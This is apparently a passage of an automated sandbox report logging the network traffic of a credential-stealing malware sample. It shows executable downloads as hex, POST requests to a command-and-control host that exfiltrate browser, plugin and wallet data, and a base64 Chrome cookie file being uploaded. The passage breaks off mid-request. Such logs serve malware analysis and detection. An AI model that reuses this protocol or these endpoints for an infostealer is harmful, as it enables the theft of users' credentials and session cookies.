                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 05 Feb 2024 11:12:59 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 05 Feb 2024 11:13:03 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 05 Feb 2024 11:13:03 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDGHost: 185.172.128.79Content-Length: 213Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 39 35 41 38 44 45 33 32 43 37 30 33 33 30 30 34 35 32 34 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 2d 2d 0d 0a Data Ascii: ------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="hwid"995A8DE32C70330045240------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="build"default------HDBGDHDAECBGDHJKFIDG--
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFHJJJDAFBKEBGDGHCGHost: 185.172.128.79Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 35 39 66 36 64 31 39 35 30 63 65 33 31 65 65 34 36 65 66 66 38 66 35 66 65 61 61 31 30 36 62 33 33 32 39 64 36 62 37 32 31 30 62 33 62 64 61 39 63 37 36 38 31 32 39 36 35 36 39 35 62 36 61 39 37 66 39 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 2d 2d 0d 0a Data Ascii: ------FBFHJJJDAFBKEBGDGHCGContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------FBFHJJJDAFBKEBGDGHCGContent-Disposition: form-data; name="message"browsers------FBFHJJJDAFBKEBGDGHCG--
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGHHost: 185.172.128.79Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 35 39 66 36 64 31 39 35 30 63 65 33 31 65 65 34 36 65 66 66 38 66 35 66 65 61 61 31 30 36 62 33 33 32 39 64 36 62 37 32 31 30 62 33 62 64 61 39 63 37 36 38 31 32 39 36 35 36 39 35 62 36 61 39 37 66 39 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 2d 2d 0d 0a Data Ascii: ------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="message"plugins------AECAECFCAAEBFHIEHDGH--
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGHDGIDAKEBAAKFCGHCHost: 185.172.128.79Content-Length: 8087Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.79Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFHHost: 185.172.128.79Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 35 39 66 36 64 31 39 35 30 63 65 33 31 65 65 34 36 65 66 66 38 66 35 66 65 61 61 31 30 36 62 33 33 32 39 64 36 62 37 32 31 30 62 33 62 64 61 39 63 37 36 38 31 32 39 36 35 36 39 35 62 36 61 39 37 66 39 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 2d 2d 0d 0a Data Ascii: ------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nU
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJEHost: 185.172.128.79Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 35 39 66 36 64 31 39 35 30 63 65 33 31 65 65 34 36 65 66 66 38 66 35 66 65 61 61 31 30 36 62 33 33 32 39 64 36 62 37 32 31 30 62 33 62 64 61 39 63 37 36 38 31 32 39 36 35 36 39 35 62 36 61 39 37 66 39 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 2d 2d 0d 0a Data Ascii: ------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="file"------GHDAAKJEGCFCAKEBKJJE--
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBFBGCGIJKJJKFIDBFCHost: 185.172.128.79Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 35 39 66 36 64 31 39 35 30 63 65 33 31 65 65 34 36 65 66 66 38 66 35 66 65 61 61 31 30 36 62 33 33 32 39 64 36 62 37 32 31 30 62 33 62 64 61 39 63 37 36 38 31 32 39 36 35 36 39 35 62 36 61 39 37 66 39 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 2d 2d 0d 0a Data Ascii: ------GCBFBGCGIJKJJKFIDBFCContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------GCBFBGCGIJKJJKFIDBFCContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GCBFBGCGIJKJJKFIDBFCContent-Disposition: form-data; name="file"------GCBFBGCGIJKJJKFIDBFC--
                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.79Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.79Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.79Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.79Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.79Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.79Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKFHost: 185.172.128.79Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBGHost: 185.172.128.79Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 35 39 66 36 64 31 39 35 30 63 65 33 31 65 65 34 36 65 66 66 38 66 35 66 65 61 61 31 30 36 62 33 33 32 39 64 36 62 37 32 31 30 62 33 62 64 61 39 63 37 36 38 31 32 39 36 35 36 39 35 62 36 61 39 37 66 39 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 2d 2d 0d 0a Data Ascii: ------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; 